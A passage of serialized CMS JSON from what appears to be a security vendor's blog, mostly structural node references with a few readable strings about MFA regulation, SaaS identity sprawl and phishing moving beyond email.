trend?","2025-03-25T00:00:00.000Z",{"items":77671},[77672,77674],{"sys":77673,"name":505},{"id":504},{"sys":77675,"name":509},{"id":508},{"items":77677},[77678],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":77679},{"url":1496},{"items":77681},[77682],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":77683},{"url":1496},{"json":77685,"links":78123},{"nodeType":165,"data":77686,"content":77687},{},[77688,77694,77710,77716,77719,77726,77732,77738,77845,77851,77856,77859,77866,77872,77878,77884,77890,77897,77903,77909,77912,77919,77925,77931,77937,77942,77948,77971,77980,77985,77988,77995,78002,78008,78038,78043,78049,78054,78057,78064,78070,78086,78091,78097],{"nodeType":178,"data":77689,"content":77690},{},[77691],{"nodeType":173,"value":26740,"marks":77692,"data":77693},[],{},{"nodeType":178,"data":77695,"content":77696},{},[77697,77700,77707],{"nodeType":173,"value":26747,"marks":77698,"data":77699},[],{},{"nodeType":186,"data":77701,"content":77702},{"uri":819},[77703],{"nodeType":173,"value":26754,"marks":77704,"data":77706},[77705],{"type":194},{},{"nodeType":173,"value":197,"marks":77708,"data":77709},[],{},{"nodeType":178,"data":77711,"content":77712},{},[77713],{"nodeType":173,"value":26765,"marks":77714,"data":77715},[],{},{"nodeType":231,"data":77717,"content":77718},{},[],{"nodeType":169,"data":77720,"content":77721},{},[77722],{"nodeType":173,"value":26775,"marks":77723,"data":77725},[77724],{"type":370},{},{"nodeType":178,"data":77727,"content":77728},{},[77729],{"nodeType":173,"value":26783,"marks":77730,"data":77731},[],{},{"nodeType":178,"data":77733,"content":77734},{},[77735],{"nodeType":173,"value":26790,"marks":77736,"data":77737},[],{},{"nodeType":250,"data":77739,"content":77740},{},[77741,77750,77769,77788,77827,77836],{"nodeType":254,"data":77742,"content":77743},{},[77744],{"nodeType":178,"data":77745,"content":77746},{},[77747],{"nodeType":173,"value":26803,"marks":77748,"data":77749},[],{},{"nodeType":254,"data":77751,"content":77752},{},[77753],{"nodeType":178,"data":77754,"content":77755},{},[77756,77759,77766],{"nodeType":173,"value":26813,"marks":77757,"data":77758},[],{},{"nodeType":186,"data":77760,"content":77761},{"uri":26258},[77762],{"nodeType":173,"value":26820,"marks":77763,"data":77765},[77764],{"type":194},{},{"nodeType":173,"value":26825,"marks":77767,"data":77768},[],{},{"nodeType":254,"data":77770,"content":77771},{},[77772],{"nodeType":178,"data":77773,"content":77774},{},[77775,77778,77785],{"nodeType":173,"value":26835,"marks":77776,"data":77777},[],{},{"nodeType":186,"data":77779,"content":77780},{"uri":26270},[77781],{"nodeType":173,"value":26842,"marks":77782,"data":77784},[77783],{"type":194},{},{"nodeType":173,"value":26847,"marks":77786,"data":77787},[],{},{"nodeType":254,"data":77789,"content":77790},{},[77791],{"nodeType":178,"data":77792,"content":77793},{},[77794,77797,77804,77807,77814,77817,77824],{"nodeType":173,"value":26857,"marks":77795,"data":77796},[],{},{"nodeType":186,"data":77798,"content":77799},{"uri":26216},[77800],{"nodeType":173,"value":26864,"marks":77801,"data":77803},[77802],{"type":194},{},{"nodeType":173,"value":26869,"marks":77805,"data":77806},[],{},{"nodeType":186,"data":77808,"content":77809},{"uri":26238},[77810],{"nodeType":173,"value":26876,"marks":77811,"data":77813},[77812],{"type":194},{},{"nodeType":173,"value":26881,"marks":77815,"data":77816},[],{},{"nodeType":186,"data":77818,"content":77819},{"uri":26886},[77820],{"nodeType":173,"value":26889,"marks":77821,"data":77823},[77822],{"type":194},{},{"nodeType":173,"value":26894,"marks":77825,"data":77826},[],{},{"nodeType":254,"data":77828,"content":77829},{},[77830],{"nodeType":178,"data":77831,"content":77832},{},[77833],{"nodeType":173,"value":26904,"marks":77834,"data":77835},[],{},{"nodeType":254,"data":77837,"content":77838},{},[77839],{"nodeType":178,"data":77840,"content":77841},{},[77842],{"nodeType":173,"value":26914,"marks":77843,"data":77844},[],{},{"nodeType":178,"data":77846,"content":77847},{},[77848],{"nodeType":173,"value":26921,"marks":77849,"data":77850},[],{},{"nodeType":312,"data":77852,"content":77855},{"target":77853},{"sys":77854},{"id":26928,"type":317,"linkType":318},[],{"nodeType":231,"data":77857,"content":77858},{},[],{"nodeType":169,"data":77860,"content":77861},{},[77862],{"nodeType":173,"value":26937,"marks":77863,"data":77865},[77864],{"type":370},{},{"nodeType":178,"data":77867,"content":77868},{},[77869],{"nodeType":173,"value":26945,"marks":77870,"data":77871},[],{},{"nodeType":178,"data":77873,"content":77874},{},[77875],{"nodeType":173,"value":26952,"marks":77876,"data":77877},[],{},{"nodeType":178,"data":77879,"content":77880},{},[77881],{"nodeType":173,"value":26959,"marks":77882,"data":77883},[],{},{"nodeType":178,"data":77885,"content":77886},{},[77887],{"nodeType":173,"value":26966,"marks":77888,"data":77889},[],{},{"nodeType":235,"data":77891,"content":77892},{},[77893],{"nodeType":173,"value":26973,"marks":77894,"data":77896},[77895],{"type":370},{},{"nodeType":178,"data":77898,"content":77899},{},[77900],{"nodeType":173,"value":26981,"marks":77901,"data":77902},[],{},{"nodeType":178,"data":77904,"content":77905},{},[77906],{"nodeType":173,"value":26988,"marks":77907,"data":77908},[],{},{"nodeType":231,"data":77910,"content":77911},{},[],{"nodeType":169,"data":77913,"content":77914},{},[77915],{"nodeType":173,"value":26998,"marks":77916,"data":77918},[77917],{"type":370},{},{"nodeType":178,"data":77920,"content":77921},{},[77922],{"nodeType":173,"value":27006,"marks":77923,"data":77924},[],{},{"nodeType":178,"data":77926,"content":77927},{},[77928],{"nodeType":173,"value":27013,"marks":77929,"data":77930},[],{},{"nodeType":178,"data":77932,"content":77933},{},[77934],{"nodeType":173,"value":27020,"marks":77935,"data":77936},[],{},{"nodeType":312,"data":77938,"content":77941},{"target":77939},{"sys":77940},{"id":27027,"type":317,"linkType":318},[],{"nodeType":178,"data":77943,"content":77944},{},[77945],{"nodeType":173,"value":27033,"marks":77946,"data":77947},[],{},{"nodeType":178,"data":77949,"content":77950},{},[77951,77954,77961,77964,77968],{"nodeType":173,"value":27040,"marks":77952,"data":77953},[],{},{"nodeType":186,"data":77955,"content":77956},{"uri":4492},[77957],{"nodeType":173,"value":27047,"marks":77958,"data":77960},[77959],{"type":194},{},{"nodeType":173,"value":27052,"marks":77962,"data":77963},[],{},{"nodeType":173,"value":27056,"marks":77965,"data":77967},[77966],{"type":370},{},{"nodeType":173,"value":27061,"marks":77969,"data":77970},[],{},{"nodeType":3769,"data":77972,"content":77973},{},[77974],{"nodeType":178,"data":77975,"content":77976},{},[77977],{"nodeType":173,"value":27071,"marks":77978,"data":77979},[],{},{"nodeType":312,"data":77981,"content":77984},{"target":77982},{"sys":77983},{"id":27078,"type":317,"linkType":318},[],{"nodeType":231,"data":77986,"content":77987},{},[],{"nodeType":169,"data":77989,"content":77990},{},[77991],{"nodeType":173,"value":5144,"marks":77992,"data":77994},[77993],{"type":370},{},{"nodeType":235,"data":77996,"content":77997},{},[77998],{"nodeType":173,"value":27094,"marks":77999,"data":78001},[78000],{"type":370},{},{"nodeType":178,"data":78003,"content":78004},{},[78005],{"nodeType":173,"value":27102,"marks":78006,"data":78007},[],{},{"nodeType":250,"data":78009,"content":78010},{},[78011,78020,78029],{"nodeType":254,"data":78012,"content":78013},{},[78014],{"nodeType":178,"data":78015,"content":78016},{},[78017],{"nodeType":173,"value":27115,"marks":78018,"data":78019},[],{},{"nodeType":254,"data":78021,"content":78022},{},[78023],{"nodeType":178,"data":78024,"content":78025},{},[78026],{"nodeType":173,"value":27125,"marks":78027,"data":78028},[],{},{"nodeType":254,"data":78030,"content":78031},{},[78032],{"nodeType":178,"data":78033,"content":78034},{},[78035],{"nodeType":173,"value":27135,"marks":78036,"data":78037},[],{},{"nodeType":312,"data":78039,"content":78042},{"target":78040},{"sys":78041},{"id":26655,"type":317,"linkType":318},[],{"nodeType":178,"data":78044,"content":78045},{},[78046],{"nodeType":173,"value":37,"marks":78047,"data":78048},[],{},{"nodeType":312,"data":78050,"content":78053},{"target":78051},{"sys":78052},{"id":27153,"type":317,"linkType":318},[],{"nodeType":231,"data":78055,"content":78056},{},[],{"nodeType":235,"data":78058,"content":78059},{},[78060],{"nodeType":173,"value":27162,"marks":78061,"data":78063},[78062],{"type":370},{},{"nodeType":178,"data":78065,"content":78066},{},[78067],{"nodeType":173,"value":27170,"marks":78068,"data":78069},[],{},{"nodeType":178,"data":78071,"content":78072},{},[78073,78076,78083],{"nodeType":173,"value":37,"marks":78074,"data":78075},[],{},{"nodeType":186,"data":78077,"content":78078},{"uri":27181},[78079],{"nodeType":173,"value":27184,"marks":78080,"data":78082},[78081],{"type":194},{},{"nodeType":173,"value":27189,"marks":78084,"data":78085},[],{},{"nodeType":312,"data":78087,"content":78090},{"target":78088},{"sys":78089},{"id":27196,"type":317,"linkType":318},[],{"nodeType":178,"data":78092,"content":78093},{},[78094],{"nodeType":173,"value":27202,"marks":78095,"data":78096},[],{},{"nodeType":178,"data":78098,"content":78099},{},[78100,78103,78110,78113,78120],{"nodeType":173,"value":1451,"marks":78101,"data":78102},[],{},{"nodeType":186,"data":78104,"content":78105},{"uri":1456},[78106],{"nodeType":173,"value":1459,"marks":78107,"data":78109},[78108],{"type":194},{},{"nodeType":173,"value":1464,"marks":78111,"data":78112},[],{},{"nodeType":186,"data":78114,"content":78115},{"uri":1469},[78116],{"nodeType":173,"value":1472,"marks":78117,"data":78119},[78118],{"type":194},{},{"nodeType":173,"value":1477,"marks":78121,"data":78122},[],{},{"entries":78124},{"hyperlink":78125,"inline":78126,"block":78127},[],[],[78128,78131,78138,78146,78148,78150],{"sys":78129,"__typename":15269,"type":15270,"ctaText":78130,"buttonLabel":87,"buttonColour":72847,"buttonUrl":27851},{"id":26928},"New whitepaper: Get the big picture on current MFA regulation and compliance",{"sys":78132,"__typename":5345,"title":78133,"caption":78133,"layoutMode":118,"file":78134},{"id":27027},"Attacks have shifted from targeting local networks to SaaS services, accessed through employee web browsers.",{"url":78135,"width":78136,"height":78137},"https://images.ctfassets.net/y1cdw1ablpvd/SadRsmdnNZofhrKddH01D/1ba16316bdfa666b2bc387d5b694e515/image2.png",1506,574,{"sys":78139,"__typename":5345,"title":78140,"caption":78141,"layoutMode":118,"file":78142},{"id":27078},"Infographic showing the identity vulnerability spread for a 1,000 seat organization","A 1,000 user organization has over 15,000 accounts with various configurations and associated vulnerabilities.",{"url":78143,"width":78144,"height":78145},"https://images.ctfassets.net/y1cdw1ablpvd/266iLQBVsJIQEx6dnUEVrZ/eb5b1be79b7b29365baf299053fddf42/Infographic.png",5480,3012,{"sys":78147,"__typename":5434,"title":67320,"arcadeDemoUrl":67321,"playText":5437},{"id":26655},{"sys":78149,"__typename":15269,"type":15270,"ctaText":28062,"buttonLabel":87,"buttonColour":15273,"buttonUrl":27851},{"id":27153},{"sys":78151,"__typename":5345,"title":78152,"caption":78153,"layoutMode":118,"file":78154},{"id":27196},"Browser-based attacks like AITM phishing, ClickFix, and consent phishing have seen an unprecedented rise in recent years.","Browser-based attacks like AITM phishing, ClickFix, and consent phishing are the fastest-growing threats of 2025. ",{"url":78155,"width":78156,"height":78157},"https://images.ctfassets.net/y1cdw1ablpvd/1eCBgB8nNDu5955f1BwFO6/b80d5cb43c7acd75e1a670d4ae22b2ec/Browser-based_attacks_graphic__1_.png",2012,1272,"content:blog:how-cyber-breaches-are-driving-tighter-mfa-requirements-and-enforcement.json","blog/how-cyber-breaches-are-driving-tighter-mfa-requirements-and-enforcement.json","blog/how-cyber-breaches-are-driving-tighter-mfa-requirements-and-enforcement",{"_path":78162,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":78163,"ogImage":118,"summary":78165,"title":63333,"subtitle":118,"metaTitle":63333,"synopsis":63334,"hashTags":118,"publishedDate":63335,"slug":63336,"tagsCollection":78176,"relatedBlogPostsCollection":78182,"authorsCollection":79655,"content":79659,"_id":80180,"_type":5439,"_source":5440,"_file":80181,"_stem":80182,"_extension":5439},"/blog/why-attackers-are-moving-beyond-email-based-phishing",{"id":62784,"publishedAt":78164},"2025-11-18T09:33:14.463Z",{"json":78166},{"data":78167,"content":78168,"nodeType":165},{},[78169],{"data":78170,"content":78171,"nodeType":178},{},[78172],{"data":78173,"marks":78174,"value":78175,"nodeType":173},{},[],"Attackers are increasingly sending phishing links over non-email delivery channels like social media, instant messaging apps, and malicious search engine ads. In this article, we explore why phishing attacks are moving away from exclusively email-based delivery, and what this means for security teams. ",{"items":78177},[78178,78180],{"sys":78179,"name":505},{"id":504},{"sys":78181,"name":509},{"id":508},{"items":78183},[78184,78667,79146],{"__typename":1528,"sys":78185,"content":78186,"title":46292,"synopsis":50301,"hashTags":118,"publishedDate":50302,"slug":46293,"tagsCollection":78657,"authorsCollection":78663},{"id":24196},{"json":78187},{"nodeType":165,"data":78188,"content":78189},{},[78190,78196,78202,78228,78234,78240,78246,78249,78256,78272,78278,78283,78289,78294,78300,78305,78311,78316,78322,78327,78333,78339,78344,78347,78354,78370,78376,78382,78387,78403,78410,78426,78433,78449,78455,78460,78486,78493,78519,78526,78542,78547,78550,78557,78573,78578,78581,78588,78594,78600,78603,78610,78616,78622,78646,78651],{"nodeType":178,"data":78191,"content":78192},{},[78193],{"nodeType":173,"value":49766,"marks":78194,"data":78195},[],{},{"nodeType":178,"data":78197,"content":78198},{},[78199],{"nodeType":173,"value":39774,"marks":78200,"data":78201},[],{},{"nodeType":178,"data":78203,"content":78204},{},[78205,78208,78215,78218,78225],{"nodeType":173,"value":39781,"marks":78206,"data":78207},[],{},{"nodeType":186,"data":78209,"content":78210},{"uri":49783},[78211],{"nodeType":173,"value":39789,"marks":78212,"data":78214},[78213],{"type":194},{},{"nodeType":173,"value":9534,"marks":78216,"data":78217},[],{},{"nodeType":186,"data":78219,"content":78220},{"uri":6820},[78221],{"nodeType":173,"value":8157,"marks":78222,"data":78224},[78223],{"type":194},{},{"nodeType":173,"value":49800,"marks":78226,"data":78227},[],{},{"nodeType":178,"data":78229,"content":78230},{},[78231],{"nodeType":173,"value":49807,"marks":78232,"data":78233},[],{},{"nodeType":178,"data":78235,"content":78236},{},[78237],{"nodeType":173,"value":49814,"marks":78238,"data":78239},[],{},{"nodeType":178,"data":78241,"content":78242},{},[78243],{"nodeType":173,"value":49821,"marks":78244,"data":78245},[],{},{"nodeType":231,"data":78247,"content":78248},{},[],{"nodeType":169,"data":78250,"content":78251},{},[78252],{"nodeType":173,"value":49831,"marks":78253,"data":78255},[78254],{"type":370},{},{"nodeType":178,"data":78257,"content":78258},{},[78259,78262,78269],{"nodeType":173,"value":49839,"marks":78260,"data":78261},[],{},{"nodeType":186,"data":78263,"content":78264},{"uri":49844},[78265],{"nodeType":173,"value":49847,"marks":78266,"data":78268},[78267],{"type":194},{},{"nodeType":173,"value":49852,"marks":78270,"data":78271},[],{},{"nodeType":178,"data":78273,"content":78274},{},[78275],{"nodeType":173,"value":49859,"marks":78276,"data":78277},[],{},{"nodeType":312,"data":78279,"content":78282},{"target":78280},{"sys":78281},{"id":49866,"type":317,"linkType":318},[],{"nodeType":178,"data":78284,"content":78285},{},[78286],{"nodeType":173,"value":49872,"marks":78287,"data":78288},[],{},{"nodeType":312,"data":78290,"content":78293},{"target":78291},{"sys":78292},{"id":49879,"type":317,"linkType":318},[],{"nodeType":178,"data":78295,"content":78296},{},[78297],{"nodeType":173,"value":49885,"marks":78298,"data":78299},[],{},{"nodeType":312,"data":78301,"content":78304},{"target":78302},{"sys":78303},{"id":49892,"type":317,"linkType":318},[],{"nodeType":178,"data":78306,"content":78307},{},[78308],{"nodeType":173,"value":49898,"marks":78309,"data":78310},[],{},{"nodeType":312,"data":78312,"content":78315},{"target":78313},{"sys":78314},{"id":49905,"type":317,"linkType":318},[],{"nodeType":178,"data":78317,"content":78318},{},[78319],{"nodeType":173,"value":49911,"marks":78320,"data":78321},[],{},{"nodeType":312,"data":78323,"content":78326},{"target":78324},{"sys":78325},{"id":49918,"type":317,"linkType":318},[],{"nodeType":178,"data":78328,"content":78329},{},[78330],{"nodeType":173,"value":49924,"marks":78331,"data":78332},[],{},{"nodeType":178,"data":78334,"content":78335},{},[78336],{"nodeType":173,"value":49931,"marks":78337,"data":78338},[],{},{"nodeType":312,"data":78340,"content":78343},{"target":78341},{"sys":78342},{"id":49938,"type":317,"linkType":318},[],{"nodeType":231,"data":78345,"content":78346},{},[],{"nodeType":169,"data":78348,"content":78349},{},[78350],{"nodeType":173,"value":49947,"marks":78351,"data":78353},[78352],{"type":370},{},{"nodeType":178,"data":78355,"content":78356},{},[78357,78360,78367],{"nodeType":173,"value":49955,"marks":78358,"data":78359},[],{},{"nodeType":186,"data":78361,"content":78362},{"uri":49960},[78363],{"nodeType":173,"value":49963,"marks":78364,"data":78366},[78365],{"type":194},{},{"nodeType":173,"value":49968,"marks":78368,"data":78369},[],{},{"nodeType":178,"data":78371,"content":78372},{},[78373],{"nodeType":173,"value":49975,"marks":78374,"data":78375},[],{},{"nodeType":178,"data":78377,"content":78378},{},[78379],{"nodeType":173,"value":49982,"marks":78380,"data":78381},[],{},{"nodeType":312,"data":78383,"content":78386},{"target":78384},{"sys":78385},{"id":49989,"type":317,"linkType":318},[],{"nodeType":178,"data":78388,"content":78389},{},[78390,78393,78400],{"nodeType":173,"value":49995,"marks":78391,"data":78392},[],{},{"nodeType":186,"data":78394,"content":78395},{"uri":6820},[78396],{"nodeType":173,"value":8157,"marks":78397,"data":78399},[78398],{"type":194},{},{"nodeType":173,"value":50006,"marks":78401,"data":78402},[],{},{"nodeType":235,"data":78404,"content":78405},{},[78406],{"nodeType":173,"value":50013,"marks":78407,"data":78409},[78408],{"type":370},{},{"nodeType":178,"data":78411,"content":78412},{},[78413,78416,78423],{"nodeType":173,"value":50021,"marks":78414,"data":78415},[],{},{"nodeType":186,"data":78417,"content":78418},{"uri":50026},[78419],{"nodeType":173,"value":50029,"marks":78420,"data":78422},[78421],{"type":194},{},{"nodeType":173,"value":50034,"marks":78424,"data":78425},[],{},{"nodeType":235,"data":78427,"content":78428},{},[78429],{"nodeType":173,"value":50041,"marks":78430,"data":78432},[78431],{"type":370},{},{"nodeType":178,"data":78434,"content":78435},{},[78436,78439,78446],{"nodeType":173,"value":37,"marks":78437,"data":78438},[],{},{"nodeType":186,"data":78440,"content":78441},{"uri":7853},[78442],{"nodeType":173,"value":50055,"marks":78443,"data":78445},[78444],{"type":194},{},{"nodeType":173,"value":50060,"marks":78447,"data":78448},[],{},{"nodeType":178,"data":78450,"content":78451},{},[78452],{"nodeType":173,"value":50067,"marks":78453,"data":78454},[],{},{"nodeType":312,"data":78456,"content":78459},{"target":78457},{"sys":78458},{"id":50074,"type":317,"linkType":318},[],{"nodeType":178,"data":78461,"content":78462},{},[78463,78466,78473,78476,78483],{"nodeType":173,"value":50080,"marks":78464,"data":78465},[],{},{"nodeType":186,"data":78467,"content":78468},{"uri":42062},[78469],{"nodeType":173,"value":50087,"marks":78470,"data":78472},[78471],{"type":194},{},{"nodeType":173,"value":50092,"marks":78474,"data":78475},[],{},{"nodeType":186,"data":78477,"content":78478},{"uri":50097},[78479],{"nodeType":173,"value":50100,"marks":78480,"data":78482},[78481],{"type":194},{},{"nodeType":173,"value":50105,"marks":78484,"data":78485},[],{},{"nodeType":235,"data":78487,"content":78488},{},[78489],{"nodeType":173,"value":50112,"marks":78490,"data":78492},[78491],{"type":370},{},{"nodeType":178,"data":78494,"content":78495},{},[78496,78499,78506,78509,78516],{"nodeType":173,"value":50120,"marks":78497,"data":78498},[],{},{"nodeType":186,"data":78500,"content":78501},{"uri":50125},[78502],{"nodeType":173,"value":50128,"marks":78503,"data":78505},[78504],{"type":194},{},{"nodeType":173,"value":50133,"marks":78507,"data":78508},[],{},{"nodeType":186,"data":78510,"content":78511},{"uri":50138},[78512],{"nodeType":173,"value":50141,"marks":78513,"data":78515},[78514],{"type":194},{},{"nodeType":173,"value":50146,"marks":78517,"data":78518},[],{},{"nodeType":235,"data":78520,"content":78521},{},[78522],{"nodeType":173,"value":50153,"marks":78523,"data":78525},[78524],{"type":370},{},{"nodeType":178,"data":78527,"content":78528},{},[78529,78532,78539],{"nodeType":173,"value":50161,"marks":78530,"data":78531},[],{},{"nodeType":186,"data":78533,"content":78534},{"uri":50166},[78535],{"nodeType":173,"value":50169,"marks":78536,"data":78538},[78537],{"type":194},{},{"nodeType":173,"value":50174,"marks":78540,"data":78541},[],{},{"nodeType":312,"data":78543,"content":78546},{"target":78544},{"sys":78545},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":78548,"content":78549},{},[],{"nodeType":169,"data":78551,"content":78552},{},[78553],{"nodeType":173,"value":50189,"marks":78554,"data":78556},[78555],{"type":370},{},{"nodeType":178,"data":78558,"content":78559},{},[78560,78563,78570],{"nodeType":173,"value":50197,"marks":78561,"data":78562},[],{},{"nodeType":186,"data":78564,"content":78565},{"uri":50202},[78566],{"nodeType":173,"value":50205,"marks":78567,"data":78569},[78568],{"type":194},{},{"nodeType":173,"value":50210,"marks":78571,"data":78572},[],{},{"nodeType":312,"data":78574,"content":78577},{"target":78575},{"sys":78576},{"id":50217,"type":317,"linkType":318},[],{"nodeType":231,"data":78579,"content":78580},{},[],{"nodeType":169,"data":78582,"content":78583},{},[78584],{"nodeType":173,"value":40632,"marks":78585,"data":78587},[78586],{"type":370},{},{"nodeType":178,"data":78589,"content":78590},{},[78591],{"nodeType":173,"value":50233,"marks":78592,"data":78593},[],{},{"nodeType":178,"data":78595,"content":78596},{},[78597],{"nodeType":173,"value":50240,"marks":78598,"data":78599},[],{},{"nodeType":231,"data":78601,"content":78602},{},[],{"nodeType":169,"data":78604,"content":78605},{},[78606],{"nodeType":173,"value":1422,"marks":78607,"data":78609},[78608],{"type":370},{},{"nodeType":178,"data":78611,"content":78612},{},[78613],{"nodeType":173,"value":42238,"marks":78614,"data":78615},[],{},{"nodeType":178,"data":78617,"content":78618},{},[78619],{"nodeType":173,"value":50263,"marks":78620,"data":78621},[],{},{"nodeType":178,"data":78623,"content":78624},{},[78625,78628,78634,78637,78643],{"nodeType":173,"value":1451,"marks":78626,"data":78627},[],{},{"nodeType":186,"data":78629,"content":78630},{"uri":1456},[78631],{"nodeType":173,"value":1459,"marks":78632,"data":78633},[],{},{"nodeType":173,"value":1464,"marks":78635,"data":78636},[],{},{"nodeType":186,"data":78638,"content":78639},{"uri":1469},[78640],{"nodeType":173,"value":1472,"marks":78641,"data":78642},[],{},{"nodeType":173,"value":1477,"marks":78644,"data":78645},[],{},{"nodeType":312,"data":78647,"content":78650},{"target":78648},{"sys":78649},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":78652,"content":78653},{},[78654],{"nodeType":173,"value":37,"marks":78655,"data":78656},[],{},{"items":78658},[78659,78661],{"sys":78660,"name":505},{"id":504},{"sys":78662,"name":509},{"id":508},{"items":78664},[78665],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":78666},{"url":1496},{"__typename":1528,"sys":78668,"content":78669,"title":46288,"synopsis":59481,"hashTags":118,"publishedDate":59482,"slug":46289,"tagsCollection":79136,"authorsCollection":79142},{"id":24168},{"json":78670},{"nodeType":165,"data":78671,"content":78672},{},[78673,78678,78684,78690,78696,78699,78706,78712,78728,78733,78739,78744,78750,78756,78761,78774,78779,78785,78790,78793,78800,78806,78813,78829,78835,78841,78848,78864,78871,78887,78894,78910,78915,78918,78925,78931,78970,78976,78982,78985,78992,78998,79034,79037,79044,79050,79091,79114,79120],{"nodeType":312,"data":78674,"content":78677},{"target":78675},{"sys":78676},{"id":58955,"type":317,"linkType":318},[],{"nodeType":178,"data":78679,"content":78680},{},[78681],{"nodeType":173,"value":58961,"marks":78682,"data":78683},[],{},{"nodeType":178,"data":78685,"content":78686},{},[78687],{"nodeType":173,"value":58968,"marks":78688,"data":78689},[],{},{"nodeType":178,"data":78691,"content":78692},{},[78693],{"nodeType":173,"value":58975,"marks":78694,"data":78695},[],{},{"nodeType":231,"data":78697,"content":78698},{},[],{"nodeType":169,"data":78700,"content":78701},{},[78702],{"nodeType":173,"value":24096,"marks":78703,"data":78705},[78704],{"type":370},{},{"nodeType":178,"data":78707,"content":78708},{},[78709],{"nodeType":173,"value":58992,"marks":78710,"data":78711},[],{},{"nodeType":178,"data":78713,"content":78714},{},[78715,78718,78725],{"nodeType":173,"value":58999,"marks":78716,"data":78717},[],{},{"nodeType":186,"data":78719,"content":78720},{"uri":59004},[78721],{"nodeType":173,"value":59007,"marks":78722,"data":78724},[78723],{"type":194},{},{"nodeType":173,"value":59012,"marks":78726,"data":78727},[],{},{"nodeType":312,"data":78729,"content":78732},{"target":78730},{"sys":78731},{"id":59019,"type":317,"linkType":318},[],{"nodeType":178,"data":78734,"content":78735},{},[78736],{"nodeType":173,"value":59025,"marks":78737,"data":78738},[],{},{"nodeType":312,"data":78740,"content":78743},{"target":78741},{"sys":78742},{"id":59032,"type":317,"linkType":318},[],{"nodeType":178,"data":78745,"content":78746},{},[78747],{"nodeType":173,"value":59038,"marks":78748,"data":78749},[],{},{"nodeType":178,"data":78751,"content":78752},{},[78753],{"nodeType":173,"value":59045,"marks":78754,"data":78755},[],{},{"nodeType":312,"data":78757,"content":78760},{"target":78758},{"sys":78759},{"id":59052,"type":317,"linkType":318},[],{"nodeType":178,"data":78762,"content":78763},{},[78764,78767,78771],{"nodeType":173,"value":59058,"marks":78765,"data":78766},[],{},{"nodeType":173,"value":59062,"marks":78768,"data":78770},[78769],{"type":370},{},{"nodeType":173,"value":59067,"marks":78772,"data":78773},[],{},{"nodeType":312,"data":78775,"content":78778},{"target":78776},{"sys":78777},{"id":59074,"type":317,"linkType":318},[],{"nodeType":178,"data":78780,"content":78781},{},[78782],{"nodeType":173,"value":59080,"marks":78783,"data":78784},[],{},{"nodeType":312,"data":78786,"content":78789},{"target":78787},{"sys":78788},{"id":59087,"type":317,"linkType":318},[],{"nodeType":231,"data":78791,"content":78792},{},[],{"nodeType":169,"data":78794,"content":78795},{},[78796],{"nodeType":173,"value":59096,"marks":78797,"data":78799},[78798],{"type":370},{},{"nodeType":178,"data":78801,"content":78802},{},[78803],{"nodeType":173,"value":59104,"marks":78804,"data":78805},[],{},{"nodeType":235,"data":78807,"content":78808},{},[78809],{"nodeType":173,"value":59111,"marks":78810,"data":78812},[78811],{"type":370},{},{"nodeType":178,"data":78814,"content":78815},{},[78816,78819,78826],{"nodeType":173,"value":59119,"marks":78817,"data":78818},[],{},{"nodeType":186,"data":78820,"content":78821},{"uri":58195},[78822],{"nodeType":173,"value":59126,"marks":78823,"data":78825},[78824],{"type":194},{},{"nodeType":173,"value":59131,"marks":78827,"data":78828},[],{},{"nodeType":178,"data":78830,"content":78831},{},[78832],{"nodeType":173,"value":59138,"marks":78833,"data":78834},[],{},{"nodeType":178,"data":78836,"content":78837},{},[78838],{"nodeType":173,"value":59145,"marks":78839,"data":78840},[],{},{"nodeType":235,"data":78842,"content":78843},{},[78844],{"nodeType":173,"value":59152,"marks":78845,"data":78847},[78846],{"type":370},{},{"nodeType":178,"data":78849,"content":78850},{},[78851,78854,78861],{"nodeType":173,"value":59160,"marks":78852,"data":78853},[],{},{"nodeType":186,"data":78855,"content":78856},{"uri":58235},[78857],{"nodeType":173,"value":59167,"marks":78858,"data":78860},[78859],{"type":194},{},{"nodeType":173,"value":59172,"marks":78862,"data":78863},[],{},{"nodeType":235,"data":78865,"content":78866},{},[78867],{"nodeType":173,"value":59179,"marks":78868,"data":78870},[78869],{"type":370},{},{"nodeType":178,"data":78872,"content":78873},{},[78874,78877,78884],{"nodeType":173,"value":59187,"marks":78875,"data":78876},[],{},{"nodeType":186,"data":78878,"content":78879},{"uri":50026},[78880],{"nodeType":173,"value":59194,"marks":78881,"data":78883},[78882],{"type":194},{},{"nodeType":173,"value":59199,"marks":78885,"data":78886},[],{},{"nodeType":235,"data":78888,"content":78889},{},[78890],{"nodeType":173,"value":59206,"marks":78891,"data":78893},[78892],{"type":370},{},{"nodeType":178,"data":78895,"content":78896},{},[78897,78900,78907],{"nodeType":173,"value":59214,"marks":78898,"data":78899},[],{},{"nodeType":186,"data":78901,"content":78902},{"uri":8419},[78903],{"nodeType":173,"value":59221,"marks":78904,"data":78906},[78905],{"type":194},{},{"nodeType":173,"value":59226,"marks":78908,"data":78909},[],{},{"nodeType":312,"data":78911,"content":78914},{"target":78912},{"sys":78913},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":78916,"content":78917},{},[],{"nodeType":169,"data":78919,"content":78920},{},[78921],{"nodeType":173,"value":59241,"marks":78922,"data":78924},[78923],{"type":370},{},{"nodeType":178,"data":78926,"content":78927},{},[78928],{"nodeType":173,"value":59249,"marks":78929,"data":78930},[],{},{"nodeType":250,"data":78932,"content":78933},{},[78934,78943,78952,78961],{"nodeType":254,"data":78935,"content":78936},{},[78937],{"nodeType":178,"data":78938,"content":78939},{},[78940],{"nodeType":173,"value":59262,"marks":78941,"data":78942},[],{},{"nodeType":254,"data":78944,"content":78945},{},[78946],{"nodeType":178,"data":78947,"content":78948},{},[78949],{"nodeType":173,"value":59272,"marks":78950,"data":78951},[],{},{"nodeType":254,"data":78953,"content":78954},{},[78955],{"nodeType":178,"data":78956,"content":78957},{},[78958],{"nodeType":173,"value":59282,"marks":78959,"data":78960},[],{},{"nodeType":254,"data":78962,"content":78963},{},[78964],{"nodeType":178,"data":78965,"content":78966},{},[78967],{"nodeType":173,"value":59292,"marks":78968,"data":78969},[],{},{"nodeType":178,"data":78971,"content":78972},{},[78973],{"nodeType":173,"value":59299,"marks":78974,"data":78975},[],{},{"nodeType":178,"data":78977,"content":78978},{},[78979],{"nodeType":173,"value":59306,"marks":78980,"data":78981},[],{},{"nodeType":231,"data":78983,"content":78984},{},[],{"nodeType":169,"data":78986,